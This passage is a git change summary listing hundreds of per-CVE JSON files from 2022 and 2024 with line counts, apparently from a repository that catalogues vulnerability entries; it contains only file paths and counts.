2024/CVE-2024-33559.json | 33 + 2024/CVE-2024-33644.json | 33 + 2024/CVE-2024-33722.json | 33 + 2024/CVE-2024-33775.json | 33 + 2024/CVE-2024-33883.json | 37 + 2024/CVE-2024-33901.json | 33 + 2024/CVE-2024-33911.json | 33 + 2024/CVE-2024-3393.json | 33 + 2024/CVE-2024-3400.json | 1164 ++ 2024/CVE-2024-34102.json | 717 ++ 2024/CVE-2024-34144.json | 33 + 2024/CVE-2024-34220.json | 33 + 2024/CVE-2024-34221.json | 33 + 2024/CVE-2024-34222.json | 33 + 2024/CVE-2024-34223.json | 33 + 2024/CVE-2024-34224.json | 33 + 2024/CVE-2024-34225.json | 33 + 2024/CVE-2024-34226.json | 33 + 2024/CVE-2024-34310.json | 33 + 2024/CVE-2024-34312.json | 36 + 2024/CVE-2024-34313.json | 36 + 2024/CVE-2024-34329.json | 33 + 2024/CVE-2024-3435.json | 33 + 2024/CVE-2024-34350.json | 33 + 2024/CVE-2024-34351.json | 95 + 2024/CVE-2024-34361.json | 33 + 2024/CVE-2024-34452.json | 33 + 2024/CVE-2024-34463.json | 33 + 2024/CVE-2024-34469.json | 33 + 2024/CVE-2024-34470.json | 157 + 2024/CVE-2024-34471.json | 33 + 2024/CVE-2024-34472.json | 33 + 2024/CVE-2024-34474.json | 33 + 2024/CVE-2024-34582.json | 33 + 2024/CVE-2024-34693.json | 70 + 2024/CVE-2024-34716.json | 64 + 2024/CVE-2024-34739.json | 33 + 2024/CVE-2024-34741.json | 33 + 2024/CVE-2024-34831.json | 33 + 2024/CVE-2024-34833.json | 33 + 2024/CVE-2024-3495.json | 64 + 2024/CVE-2024-34958.json | 33 + 2024/CVE-2024-35133.json | 33 + 2024/CVE-2024-35176.json | 33 + 2024/CVE-2024-35205.json | 33 + 2024/CVE-2024-35242.json | 33 + 2024/CVE-2024-35250.json | 99 + 2024/CVE-2024-35286.json | 33 + 2024/CVE-2024-35315.json | 33 + 2024/CVE-2024-35333.json | 33 + 2024/CVE-2024-35468.json | 33 + 2024/CVE-2024-35469.json | 33 + 2024/CVE-2024-35475.json | 33 + 2024/CVE-2024-35511.json | 33 + 2024/CVE-2024-3552.json | 33 + 2024/CVE-2024-35538.json | 33 + 2024/CVE-2024-35584.json | 33 + 2024/CVE-2024-3596.json | 33 + 2024/CVE-2024-36079.json | 33 + 2024/CVE-2024-36104.json | 33 + 2024/CVE-2024-36401.json | 505 + 2024/CVE-2024-36416.json | 33 + 2024/CVE-2024-36424.json | 33 + 2024/CVE-2024-36527.json | 33 + 2024/CVE-2024-36539.json | 33 + 2024/CVE-2024-3656.json | 33 + 2024/CVE-2024-36821.json | 33 + 2024/CVE-2024-36823.json | 33 + 2024/CVE-2024-36837.json | 64 + 2024/CVE-2024-36842.json | 33 + 2024/CVE-2024-36877.json | 64 + 2024/CVE-2024-3690.json | 33 + 2024/CVE-2024-36991.json | 163 + 2024/CVE-2024-37032.json | 64 + 2024/CVE-2024-37051.json | 68 + 2024/CVE-2024-37081.json | 133 + 2024/CVE-2024-37084.json | 162 + 2024/CVE-2024-37085.json | 126 + 2024/CVE-2024-37147.json | 33 + 2024/CVE-2024-37383.json | 64 + 2024/CVE-2024-37393.json | 33 + 2024/CVE-2024-37726.json | 64 + 2024/CVE-2024-37742.json | 33 + 2024/CVE-2024-37759.json | 33 + 2024/CVE-2024-37762.json | 33 + 2024/CVE-2024-37763.json | 33 + 2024/CVE-2024-37764.json | 33 + 2024/CVE-2024-37765.json | 33 + 2024/CVE-2024-37770.json | 33 + 2024/CVE-2024-37791.json | 33 + 2024/CVE-2024-37843.json | 33 + 2024/CVE-2024-37888.json | 50 + 2024/CVE-2024-37889.json | 33 + 2024/CVE-2024-38036.json | 33 + 2024/CVE-2024-38041.json | 33 + 2024/CVE-2024-3806.json | 64 + 2024/CVE-2024-38063.json | 920 ++ 2024/CVE-2024-38077.json | 416 + 2024/CVE-2024-38080.json | 33 + 2024/CVE-2024-38100.json | 33 + 2024/CVE-2024-38124.json | 33 + 2024/CVE-2024-38127.json | 33 + 2024/CVE-2024-38144.json | 33 + 2024/CVE-2024-38189.json | 33 + 2024/CVE-2024-38193.json | 33 + 2024/CVE-2024-38200.json | 33 + 2024/CVE-2024-38366.json | 36 + 2024/CVE-2024-38396.json | 33 + 2024/CVE-2024-38472.json | 75 + 2024/CVE-2024-38473.json | 64 + 2024/CVE-2024-38475.json | 64 + 2024/CVE-2024-38526.json | 33 + 2024/CVE-2024-38537.json | 33 + 2024/CVE-2024-3867.json | 33 + 2024/CVE-2024-38793.json | 33 + 2024/CVE-2024-38816.json | 157 + 2024/CVE-2024-38819.json | 64 + 2024/CVE-2024-38821.json | 33 + 2024/CVE-2024-38856.json | 258 + 2024/CVE-2024-38998.json | 33 + 2024/CVE-2024-39031.json | 33 + 2024/CVE-2024-39069.json | 33 + 2024/CVE-2024-39081.json | 33 + 2024/CVE-2024-39090.json | 33 + 2024/CVE-2024-39203.json | 33 + 2024/CVE-2024-39205.json | 37 + 2024/CVE-2024-39210.json | 33 + 2024/CVE-2024-39211.json | 33 + 2024/CVE-2024-3922.json | 33 + 2024/CVE-2024-39248.json | 33 + 2024/CVE-2024-39250.json | 33 + 2024/CVE-2024-39304.json | 33 + 2024/CVE-2024-39306.json | 33 + 2024/CVE-2024-39614.json | 33 + 2024/CVE-2024-39689.json | 33 + 2024/CVE-2024-39700.json | 33 + 2024/CVE-2024-39844.json | 33 + 2024/CVE-2024-39908.json | 33 + 2024/CVE-2024-39914.json | 33 + 2024/CVE-2024-39929.json | 64 + 2024/CVE-2024-39943.json | 33 + 2024/CVE-2024-40080.json | 33 + 2024/CVE-2024-40110.json | 33 + 2024/CVE-2024-40119.json | 33 + 2024/CVE-2024-40318.json | 35 + 2024/CVE-2024-40324.json | 33 + 2024/CVE-2024-40348.json | 64 + 2024/CVE-2024-4040.json | 533 + 2024/CVE-2024-40422.json | 64 + 2024/CVE-2024-40431.json | 33 + 2024/CVE-2024-40443.json | 33 + 2024/CVE-2024-40457.json | 33 + 2024/CVE-2024-40492.json | 33 + 2024/CVE-2024-40498.json | 33 + 2024/CVE-2024-40500.json | 33 + 2024/CVE-2024-40506.json | 33 + 2024/CVE-2024-40507.json | 33 + 2024/CVE-2024-40508.json | 33 + 2024/CVE-2024-40509.json | 33 + 2024/CVE-2024-40510.json | 33 + 2024/CVE-2024-40511.json | 33 + 2024/CVE-2024-40512.json | 33 + 2024/CVE-2024-40617.json | 33 + 2024/CVE-2024-40658.json | 33 + 2024/CVE-2024-40662.json | 33 + 2024/CVE-2024-40673.json | 33 + 2024/CVE-2024-40675.json | 33 + 2024/CVE-2024-40676.json | 64 + 2024/CVE-2024-40711.json | 95 + 2024/CVE-2024-40725.json | 95 + 2024/CVE-2024-40892.json | 33 + 2024/CVE-2024-41107.json | 33 + 2024/CVE-2024-41110.json | 64 + 2024/CVE-2024-41276.json | 33 + 2024/CVE-2024-41290.json | 33 + 2024/CVE-2024-41301.json | 33 + 2024/CVE-2024-41302.json | 33 + 2024/CVE-2024-41312.json | 33 + 2024/CVE-2024-41319.json | 33 + 2024/CVE-2024-41570.json | 33 + 2024/CVE-2024-41628.json | 33 + 2024/CVE-2024-41640.json | 33 + 2024/CVE-2024-41651.json | 33 + 2024/CVE-2024-41662.json | 33 + 2024/CVE-2024-41713.json | 95 + 2024/CVE-2024-41958.json | 33 + 2024/CVE-2024-41992.json | 33 + 2024/CVE-2024-4231.json | 33 + 2024/CVE-2024-4232.json | 64 + 2024/CVE-2024-42327.json | 219 + 2024/CVE-2024-42346.json | 36 + 2024/CVE-2024-42448.json | 33 + 2024/CVE-2024-42461.json | 33 + 2024/CVE-2024-42640.json | 69 + 2024/CVE-2024-42642.json | 33 + 2024/CVE-2024-42657.json | 33 + 2024/CVE-2024-42658.json | 33 + 2024/CVE-2024-42758.json | 33 + 2024/CVE-2024-42834.json | 33 + 2024/CVE-2024-42845.json | 37 + 2024/CVE-2024-42849.json | 33 + 2024/CVE-2024-42850.json | 33 + 2024/CVE-2024-42861.json | 33 + 2024/CVE-2024-42919.json | 33 + 2024/CVE-2024-4295.json | 64 + 2024/CVE-2024-42992.json | 33 + 2024/CVE-2024-43035.json | 33 + 2024/CVE-2024-43044.json | 130 + 2024/CVE-2024-43160.json | 33 + 2024/CVE-2024-4320.json | 33 + 2024/CVE-2024-4323.json | 102 + 2024/CVE-2024-43363.json | 33 + 2024/CVE-2024-43416.json | 33 + 2024/CVE-2024-43425.json | 33 + 2024/CVE-2024-4351.json | 33 + 2024/CVE-2024-4352.json | 33 + 2024/CVE-2024-43532.json | 33 + 2024/CVE-2024-4358.json | 193 + 2024/CVE-2024-436.json | 33 + 2024/CVE-2024-4367.json | 363 + 2024/CVE-2024-43917.json | 33 + 2024/CVE-2024-43918.json | 33 + 2024/CVE-2024-43919.json | 33 + 2024/CVE-2024-43965.json | 33 + 2024/CVE-2024-43998.json | 33 + 2024/CVE-2024-44000.json | 126 + 2024/CVE-2024-4406.json | 33 + 2024/CVE-2024-44083.json | 33 + 2024/CVE-2024-44193.json | 33 + 2024/CVE-2024-44258.json | 33 + 2024/CVE-2024-44285.json | 33 + 2024/CVE-2024-44337.json | 33 + 2024/CVE-2024-44346.json | 71 + 2024/CVE-2024-44349.json | 33 + 2024/CVE-2024-4439.json | 157 + 2024/CVE-2024-4443.json | 33 + 2024/CVE-2024-44450.json | 33 + 2024/CVE-2024-44541.json | 33 + 2024/CVE-2024-44542.json | 33 + 2024/CVE-2024-44610.json | 33 + 2024/CVE-2024-44623.json | 35 + 2024/CVE-2024-44625.json | 33 + 2024/CVE-2024-44765.json | 33 + 2024/CVE-2024-44812.json | 33 + 2024/CVE-2024-44815.json | 33 + 2024/CVE-2024-44849.json | 33 + 2024/CVE-2024-44867.json | 33 + 2024/CVE-2024-44902.json | 33 + 2024/CVE-2024-44946.json | 33 + 2024/CVE-2024-44947.json | 33 + 2024/CVE-2024-45058.json | 33 + 2024/CVE-2024-45200.json | 39 + 2024/CVE-2024-45216.json | 33 + 2024/CVE-2024-45241.json | 71 + 2024/CVE-2024-45244.json | 100 + 2024/CVE-2024-45264.json | 33 + 2024/CVE-2024-45265.json | 33 + 2024/CVE-2024-45337.json | 74 + 2024/CVE-2024-45383.json | 33 + 2024/CVE-2024-45409.json | 33 + 2024/CVE-2024-45410.json | 33 + 2024/CVE-2024-45436.json | 69 + 2024/CVE-2024-45440.json | 33 + 2024/CVE-2024-45492.json | 33 + 2024/CVE-2024-45507.json | 33 + 2024/CVE-2024-45519.json | 131 + 2024/CVE-2024-45589.json | 33 + 2024/CVE-2024-45614.json | 33 + 2024/CVE-2024-4573.json | 33 + 2024/CVE-2024-4577.json | 1713 +++ 2024/CVE-2024-46209.json | 33 + 2024/CVE-2024-46256.json | 33 + 2024/CVE-2024-46278.json | 33 + 2024/CVE-2024-46310.json | 33 + 2024/CVE-2024-46377.json | 33 + 2024/CVE-2024-46383.json | 33 + 2024/CVE-2024-46451.json | 33 + 2024/CVE-2024-46483.json | 33 + 2024/CVE-2024-46532.json | 33 + 2024/CVE-2024-46538.json | 74 + 2024/CVE-2024-46542.json | 33 + 2024/CVE-2024-46627.json | 33 + 2024/CVE-2024-46635.json | 33 + 2024/CVE-2024-46658.json | 33 + 2024/CVE-2024-46901.json | 33 + 2024/CVE-2024-46982.json | 33 + 2024/CVE-2024-46986.json | 33 + 2024/CVE-2024-4701.json | 33 + 2024/CVE-2024-47062.json | 33 + 2024/CVE-2024-47066.json | 38 + 2024/CVE-2024-47076.json | 33 + 2024/CVE-2024-47138.json | 33 + 2024/CVE-2024-47176.json | 419 + 2024/CVE-2024-47177.json | 33 + 2024/CVE-2024-47575.json | 157 + 2024/CVE-2024-4761.json | 33 + 2024/CVE-2024-47854.json | 33 + 2024/CVE-2024-48197.json | 33 + 2024/CVE-2024-48208.json | 41 + 2024/CVE-2024-48217.json | 33 + 2024/CVE-2024-48245.json | 33 + 2024/CVE-2024-48246.json | 33 + 2024/CVE-2024-48322.json | 33 + 2024/CVE-2024-48325.json | 33 + 2024/CVE-2024-48326.json | 33 + 2024/CVE-2024-48336.json | 33 + 2024/CVE-2024-48359.json | 33 + 2024/CVE-2024-48360.json | 33 + 2024/CVE-2024-48392.json | 33 + 2024/CVE-2024-48415.json | 33 + 2024/CVE-2024-48427.json | 33 + 2024/CVE-2024-48569.json | 33 + 2024/CVE-2024-48605.json | 33 + 2024/CVE-2024-48644.json | 33 + 2024/CVE-2024-48652.json | 33 + 2024/CVE-2024-48705.json | 33 + 2024/CVE-2024-4875.json | 33 + 2024/CVE-2024-48762.json | 33 + 2024/CVE-2024-4879.json | 281 + 2024/CVE-2024-4883.json | 33 + 2024/CVE-2024-4885.json | 33 + 2024/CVE-2024-48914.json | 41 + 2024/CVE-2024-48955.json | 33 + 2024/CVE-2024-4898.json | 64 + 2024/CVE-2024-48990.json | 281 + 2024/CVE-2024-49039.json | 64 + 2024/CVE-2024-49112.json | 64 + 2024/CVE-2024-49113.json | 126 + 2024/CVE-2024-49117.json | 33 + 2024/CVE-2024-49203.json | 33 + 2024/CVE-2024-49328.json | 33 + 2024/CVE-2024-49368.json | 33 + 2024/CVE-2024-49369.json | 33 + 2024/CVE-2024-49379.json | 33 + 2024/CVE-2024-4956.json | 557 + 2024/CVE-2024-49607.json | 33 + 2024/CVE-2024-49681.json | 33 + 2024/CVE-2024-5009.json | 64 + 2024/CVE-2024-50251.json | 33 + 2024/CVE-2024-50335.json | 33 + 2024/CVE-2024-50340.json | 33 + 2024/CVE-2024-50379.json | 343 + 2024/CVE-2024-50395.json | 33 + 2024/CVE-2024-50427.json | 33 + 2024/CVE-2024-50450.json | 33 + 2024/CVE-2024-50473.json | 33 + 2024/CVE-2024-50475.json | 33 + 2024/CVE-2024-50476.json | 33 + 2024/CVE-2024-50477.json | 33 + 2024/CVE-2024-50478.json | 33 + 2024/CVE-2024-50482.json | 33 + 2024/CVE-2024-50483.json | 33 + 2024/CVE-2024-50485.json | 33 + 2024/CVE-2024-50488.json | 33 + 2024/CVE-2024-50490.json | 33 + 2024/CVE-2024-50493.json | 33 + 2024/CVE-2024-50498.json | 95 + 2024/CVE-2024-50507.json | 33 + 2024/CVE-2024-50508.json | 33 + 2024/CVE-2024-50509.json | 33 + 2024/CVE-2024-50510.json | 33 + 2024/CVE-2024-50623.json | 101 + 2024/CVE-2024-50657.json | 33 + 2024/CVE-2024-50677.json | 33 + 2024/CVE-2024-50803.json | 33 + 2024/CVE-2024-50804.json | 33 + 2024/CVE-2024-5084.json | 197 + 2024/CVE-2024-50848.json | 33 + 2024/CVE-2024-50849.json | 33 + 2024/CVE-2024-50944.json | 33 + 2024/CVE-2024-50945.json | 33 + 2024/CVE-2024-50961.json | 37 + 2024/CVE-2024-50962.json | 37 + 2024/CVE-2024-50964.json | 37 + 2024/CVE-2024-50968.json | 33 + 2024/CVE-2024-50969.json | 33 + 2024/CVE-2024-50970.json | 33 + 2024/CVE-2024-50971.json | 33 + 2024/CVE-2024-50972.json | 33 + 2024/CVE-2024-50986.json | 33 + 2024/CVE-2024-51026.json | 33 + 2024/CVE-2024-51030.json | 33 + 2024/CVE-2024-51031.json | 33 + 2024/CVE-2024-51032.json | 33 + 2024/CVE-2024-51132.json | 33 + 2024/CVE-2024-51179.json | 33 + 2024/CVE-2024-5124.json | 64 + 2024/CVE-2024-51358.json | 33 + 2024/CVE-2024-51378.json | 64 + 2024/CVE-2024-51430.json | 33 + 2024/CVE-2024-51435.json | 33 + 2024/CVE-2024-51442.json | 33 + 2024/CVE-2024-51567.json | 98 + 2024/CVE-2024-51665.json | 33 + 2024/CVE-2024-51747.json | 33 + 2024/CVE-2024-52002.json | 33 + 2024/CVE-2024-52301.json | 95 + 2024/CVE-2024-52302.json | 33 + 2024/CVE-2024-52316.json | 33 + 2024/CVE-2024-52317.json | 33 + 2024/CVE-2024-52318.json | 33 + 2024/CVE-2024-52335.json | 33 + 2024/CVE-2024-52380.json | 64 + 2024/CVE-2024-52382.json | 33 + 2024/CVE-2024-52429.json | 33 + 2024/CVE-2024-52430.json | 33 + 2024/CVE-2024-52433.json | 33 + 2024/CVE-2024-5246.json | 33 + 2024/CVE-2024-52475.json | 33 + 2024/CVE-2024-52711.json | 33 + 2024/CVE-2024-5274.json | 64 + 2024/CVE-2024-52800.json | 33 + 2024/CVE-2024-52940.json | 76 + 2024/CVE-2024-5324.json | 37 + 2024/CVE-2024-53255.json | 33 + 2024/CVE-2024-53259.json | 33 + 2024/CVE-2024-5326.json | 64 + 2024/CVE-2024-53345.json | 33 + 2024/CVE-2024-53375.json | 33 + 2024/CVE-2024-53376.json | 33 + 2024/CVE-2024-53476.json | 33 + 2024/CVE-2024-53522.json | 33 + 2024/CVE-2024-5356.json | 33 + 2024/CVE-2024-53617.json | 33 + 2024/CVE-2024-53677.json | 312 + 2024/CVE-2024-54152.json | 33 + 2024/CVE-2024-5420.json | 64 + 2024/CVE-2024-54262.json | 33 + 2024/CVE-2024-54330.json | 33 + 2024/CVE-2024-54363.json | 33 + 2024/CVE-2024-54369.json | 33 + 2024/CVE-2024-54374.json | 33 + 2024/CVE-2024-54378.json | 33 + 2024/CVE-2024-54385.json | 33 + 2024/CVE-2024-5452.json | 33 + 2024/CVE-2024-54679.json | 33 + 2024/CVE-2024-54819.json | 36 + 2024/CVE-2024-54910.json | 33 + 2024/CVE-2024-55099.json | 33 + 2024/CVE-2024-5522.json | 110 + 2024/CVE-2024-55457.json | 33 + 2024/CVE-2024-55557.json | 36 + 2024/CVE-2024-55587.json | 33 + 2024/CVE-2024-55875.json | 33 + 2024/CVE-2024-55968.json | 64 + 2024/CVE-2024-55972.json | 33 + 2024/CVE-2024-55976.json | 33 + 2024/CVE-2024-55978.json | 33 + 2024/CVE-2024-55980.json | 33 + 2024/CVE-2024-55981.json | 33 + 2024/CVE-2024-55982.json | 33 + 2024/CVE-2024-55988.json | 33 + 2024/CVE-2024-56115.json | 33 + 2024/CVE-2024-56116.json | 33 + 2024/CVE-2024-56145.json | 64 + 2024/CVE-2024-5633.json | 33 + 2024/CVE-2024-56331.json | 33 + 2024/CVE-2024-56431.json | 33 + 2024/CVE-2024-56433.json | 33 + 2024/CVE-2024-56512.json | 33 + 2024/CVE-2024-5735.json | 33 + 2024/CVE-2024-5736.json | 33 + 2024/CVE-2024-5737.json | 33 + 2024/CVE-2024-5764.json | 33 + 2024/CVE-2024-5806.json | 33 + 2024/CVE-2024-5910.json | 33 + 2024/CVE-2024-5932.json | 106 + 2024/CVE-2024-5947.json | 33 + 2024/CVE-2024-5961.json | 33 + 2024/CVE-2024-6028.json | 33 + 2024/CVE-2024-6043.json | 36 + 2024/CVE-2024-6050.json | 33 + 2024/CVE-2024-6095.json | 33 + 2024/CVE-2024-6205.json | 33 + 2024/CVE-2024-6222.json | 33 + 2024/CVE-2024-6330.json | 33 + 2024/CVE-2024-6366.json | 33 + 2024/CVE-2024-6386.json | 33 + 2024/CVE-2024-6387.json | 2950 +++++ 2024/CVE-2024-6473.json | 40 + 2024/CVE-2024-6529.json | 33 + 2024/CVE-2024-6536.json | 33 + 2024/CVE-2024-6592.json | 33 + 2024/CVE-2024-6624.json | 36 + 2024/CVE-2024-6670.json | 33 + 2024/CVE-2024-6768.json | 33 + 2024/CVE-2024-6769.json | 33 + 2024/CVE-2024-6778.json | 64 + 2024/CVE-2024-6782.json | 126 + 2024/CVE-2024-7029.json | 104 + 2024/CVE-2024-7094.json | 33 + 2024/CVE-2024-7120.json | 33 + 2024/CVE-2024-7124.json | 33 + 2024/CVE-2024-7135.json | 64 + 2024/CVE-2024-7313.json | 33 + 2024/CVE-2024-7339.json | 33 + 2024/CVE-2024-7456.json | 33 + 2024/CVE-2024-7479.json | 33 + 2024/CVE-2024-7514.json | 33 + 2024/CVE-2024-7593.json | 100 + 2024/CVE-2024-7646.json | 64 + 2024/CVE-2024-7703.json | 33 + 2024/CVE-2024-7808.json | 38 + 2024/CVE-2024-7854.json | 33 + 2024/CVE-2024-7856.json | 33 + 2024/CVE-2024-7928.json | 126 + 2024/CVE-2024-7954.json | 250 + 2024/CVE-2024-7965.json | 69 + 2024/CVE-2024-8069.json | 39 + 2024/CVE-2024-8190.json | 33 + 2024/CVE-2024-8275.json | 64 + 2024/CVE-2024-8277.json | 33 + 2024/CVE-2024-8309.json | 33 + 2024/CVE-2024-8349.json | 33 + 2024/CVE-2024-8353.json | 41 + 2024/CVE-2024-8484.json | 33 + 2024/CVE-2024-8504.json | 64 + 2024/CVE-2024-8517.json | 33 + 2024/CVE-2024-8522.json | 33 + 2024/CVE-2024-8529.json | 33 + 2024/CVE-2024-8672.json | 33 + 2024/CVE-2024-8698.json | 33 + 2024/CVE-2024-8752.json | 33 + 2024/CVE-2024-8856.json | 74 + 2024/CVE-2024-8868.json | 33 + 2024/CVE-2024-8949.json | 33 + 2024/CVE-2024-8963.json | 33 + 2024/CVE-2024-9014.json | 33 + 2024/CVE-2024-9047.json | 33 + 2024/CVE-2024-9061.json | 33 + 2024/CVE-2024-9106.json | 33 + 2024/CVE-2024-9162.json | 33 + 2024/CVE-2024-9166.json | 41 + 2024/CVE-2024-9224.json | 33 + 2024/CVE-2024-9234.json | 95 + 2024/CVE-2024-9264.json | 150 + 2024/CVE-2024-9290.json | 76 + 2024/CVE-2024-9326.json | 33 + 2024/CVE-2024-9441.json | 131 + 2024/CVE-2024-9464.json | 33 + 2024/CVE-2024-9465.json | 95 + 2024/CVE-2024-9466.json | 33 + 2024/CVE-2024-9474.json | 126 + 2024/CVE-2024-9570.json | 33 + 2024/CVE-2024-9593.json | 95 + 2024/CVE-2024-9680.json | 64 + 2024/CVE-2024-9707.json | 33 + 2024/CVE-2024-9796.json | 64 + 2024/CVE-2024-9821.json | 33 + 2024/CVE-2024-9822.json | 33 + 2024/CVE-2024-9890.json | 33 + 2024/CVE-2024-9926.json | 79 + 2024/CVE-2024-9932.json | 33 + 2024/CVE-2024-9933.json | 64 + 2024/CVE-2024-9935.json | 102 + 2024/CVE-2024-9955.json | 33 + README.md | 21503 ++++++++++++++++++++++++++++++++++- 2797 files changed, 210253 insertions(+), 89 deletions(-) create mode 100644 2022/CVE-2022-0155.json create mode 100644 2022/CVE-2022-0165.json create mode 100644 2022/CVE-2022-0219.json create mode 100644 2022/CVE-2022-0236.json create mode 100644 2022/CVE-2022-0316.json create mode 100644 2022/CVE-2022-0332.json create mode 100644 2022/CVE-2022-0412.json create mode 100644 2022/CVE-2022-0435.json create mode 100644 2022/CVE-2022-0439.json create mode 100644 2022/CVE-2022-0529.json create mode 100644 2022/CVE-2022-0591.json create mode 100644 2022/CVE-2022-0666.json create mode 100644 2022/CVE-2022-0725.json create mode 100644 2022/CVE-2022-0739.json create mode 100644 2022/CVE-2022-0811.json create mode 100644 2022/CVE-2022-0848.json create mode 100644 2022/CVE-2022-0853.json create mode 100644 2022/CVE-2022-0944.json create mode 100644 2022/CVE-2022-0952.json create mode 100644 2022/CVE-2022-0995.json create mode 100644 2022/CVE-2022-1011.json create mode 100644 2022/CVE-2022-1012.json create mode 100644 2022/CVE-2022-1026.json create mode 100644 2022/CVE-2022-10270.json create mode 100644 2022/CVE-2022-1068.json create mode 100644 2022/CVE-2022-1096.json create mode 100644 2022/CVE-2022-1119.json create mode 100644 2022/CVE-2022-1203.json create mode 100644 2022/CVE-2022-1227.json create mode 100644 2022/CVE-2022-1364.json create mode 100644 2022/CVE-2022-1386.json create mode 100644 2022/CVE-2022-1421.json create mode 100644 2022/CVE-2022-1442.json create mode 100644 2022/CVE-2022-1471.json create mode 100644 2022/CVE-2022-14733.json create mode 100644 2022/CVE-2022-1565.json create mode 100644 2022/CVE-2022-1679.json create mode 100644 2022/CVE-2022-1802.json create mode 100644 2022/CVE-2022-20009.json create mode 100644 2022/CVE-2022-20120.json create mode 100644 2022/CVE-2022-20126.json create mode 100644 2022/CVE-2022-20128.json create mode 100644 2022/CVE-2022-20130.json create mode 100644 2022/CVE-2022-20138.json create mode 100644 2022/CVE-2022-20140.json create mode 100644 2022/CVE-2022-20142.json create mode 100644 2022/CVE-2022-20186.json create mode 100644 2022/CVE-2022-20223.json create mode 100644 2022/CVE-2022-20224.json create mode 100644 2022/CVE-2022-20229.json create mode 100644 2022/CVE-2022-20338.json create mode 100644 2022/CVE-2022-20347.json create mode 100644 2022/CVE-2022-20360.json create mode 100644 2022/CVE-2022-20361.json create mode 100644 2022/CVE-2022-20409.json create mode 100644 2022/CVE-2022-20413.json create mode 100644 2022/CVE-2022-20421.json create mode 100644 2022/CVE-2022-20452.json create mode 100644 2022/CVE-2022-20456.json create mode 100644 2022/CVE-2022-20470.json create mode 100644 2022/CVE-2022-20473.json create mode 100644 2022/CVE-2022-20474.json create mode 100644 2022/CVE-2022-20489.json create mode 100644 2022/CVE-2022-20490.json create mode 100644 2022/CVE-2022-20492.json create mode 100644 2022/CVE-2022-20493.json create mode 100644 2022/CVE-2022-20494.json create mode 100644 2022/CVE-2022-20607.json create mode 100644 2022/CVE-2022-20699.json create mode 100644 2022/CVE-2022-2078.json create mode 100644 2022/CVE-2022-20818.json create mode 100644 2022/CVE-2022-20866.json create mode 100644 2022/CVE-2022-2097.json create mode 100644 2022/CVE-2022-2109.json create mode 100644 2022/CVE-2022-21241.json create mode 100644 2022/CVE-2022-21306.json create mode 100644 2022/CVE-2022-21340.json create mode 100644 2022/CVE-2022-21350.json create mode 100644 2022/CVE-2022-21371.json create mode 100644 2022/CVE-2022-21392.json create mode 100644 2022/CVE-2022-21445.json create mode 100644 2022/CVE-2022-21500.json create mode 100644 2022/CVE-2022-21587.json create mode 100644 2022/CVE-2022-21658.json create mode 100644 2022/CVE-2022-21660.json create mode 100644 2022/CVE-2022-21668.json create mode 100644 2022/CVE-2022-21839.json create mode 100644 2022/CVE-2022-2185.json create mode 100644 2022/CVE-2022-21877.json create mode 100644 2022/CVE-2022-21881.json create mode 100644 2022/CVE-2022-21882.json create mode 100644 2022/CVE-2022-21894.json create mode 100644 2022/CVE-2022-21970.json create mode 100644 2022/CVE-2022-21974.json create mode 100644 2022/CVE-2022-21999.json create mode 100644 2022/CVE-2022-22029.json create mode 100644 2022/CVE-2022-22057.json create mode 100644 2022/CVE-2022-22063.json create mode 100644 2022/CVE-2022-22274.json create mode 100644 2022/CVE-2022-22296.json create mode 100644 2022/CVE-2022-22536.json create mode 100644 2022/CVE-2022-22555.json create mode 100644 2022/CVE-2022-22582.json create mode 100644 2022/CVE-2022-22600.json create mode 100644 2022/CVE-2022-22629.json create mode 100644 2022/CVE-2022-22720.json create mode 100644 2022/CVE-2022-22733.json create mode 100644 2022/CVE-2022-2274.json create mode 100644 2022/CVE-2022-22818.json create mode 100644 2022/CVE-2022-22828.json create mode 100644 2022/CVE-2022-22845.json create mode 100644 2022/CVE-2022-22850.json create mode 100644 2022/CVE-2022-22851.json create mode 100644 2022/CVE-2022-22852.json create mode 100644 2022/CVE-2022-22885.json create mode 100644 2022/CVE-2022-22966.json create mode 100644 2022/CVE-2022-22970.json create mode 100644 2022/CVE-2022-22971.json create mode 100644 2022/CVE-2022-23093.json create mode 100644 2022/CVE-2022-23277.json create mode 100644 2022/CVE-2022-23303.json create mode 100644 2022/CVE-2022-23361.json create mode 100644 2022/CVE-2022-23378.json create mode 100644 2022/CVE-2022-23529.json create mode 100644 2022/CVE-2022-23614.json create mode 100644 2022/CVE-2022-23648.json create mode 100644 2022/CVE-2022-23731.json create mode 100644 2022/CVE-2022-23773.json create mode 100644 2022/CVE-2022-23779.json create mode 100644 2022/CVE-2022-23812.json create mode 100644 2022/CVE-2022-23861.json create mode 100644 2022/CVE-2022-23862.json create mode 100644 2022/CVE-2022-23884.json create mode 100644 2022/CVE-2022-23935.json create mode 100644 2022/CVE-2022-23940.json create mode 100644 2022/CVE-2022-23967.json create mode 100644 2022/CVE-2022-23988.json create mode 100644 2022/CVE-2022-24112.json create mode 100644 2022/CVE-2022-24122.json create mode 100644 2022/CVE-2022-2414.json create mode 100644 2022/CVE-2022-24227.json create mode 100644 2022/CVE-2022-24342.json create mode 100644 2022/CVE-2022-24439.json create mode 100644 2022/CVE-2022-24442.json create mode 100644 2022/CVE-2022-24481.json create mode 100644 2022/CVE-2022-24500.json create mode 100644 2022/CVE-2022-24637.json create mode 100644 2022/CVE-2022-24654.json create mode 100644 2022/CVE-2022-2466.json create mode 100644 2022/CVE-2022-24702.json create mode 100644 2022/CVE-2022-24715.json create mode 100644 2022/CVE-2022-24716.json create mode 100644 2022/CVE-2022-24760.json create mode 100644 2022/CVE-2022-24780.json create mode 100644 2022/CVE-2022-24818.json create mode 100644 2022/CVE-2022-24834.json create mode 100644 2022/CVE-2022-24992.json create mode 100644 2022/CVE-2022-25012.json create mode 100644 2022/CVE-2022-25018.json create mode 100644 2022/CVE-2022-25020.json create mode 100644 2022/CVE-2022-25022.json create mode 100644 2022/CVE-2022-25060.json create mode 100644 2022/CVE-2022-25061.json create mode 100644 2022/CVE-2022-25062.json create mode 100644 2022/CVE-2022-25063.json create mode 100644 2022/CVE-2022-25064.json create mode 100644 2022/CVE-2022-25257.json create mode 100644 2022/CVE-2022-25258.json create mode 100644 2022/CVE-2022-25260.json create mode 100644 2022/CVE-2022-25265.json create mode 100644 2022/CVE-2022-25365.json create mode 100644 2022/CVE-2022-25375.json create mode 100644 2022/CVE-2022-2546.json create mode 100644 2022/CVE-2022-25479.json create mode 100644 2022/CVE-2022-25640.json create mode 100644 2022/CVE-2022-25765.json create mode 100644 2022/CVE-2022-25813.json create mode 100644 2022/CVE-2022-25845.json create mode 100644 2022/CVE-2022-2586.json create mode 100644 2022/CVE-2022-2588.json create mode 100644 2022/CVE-2022-2590.json create mode 100644 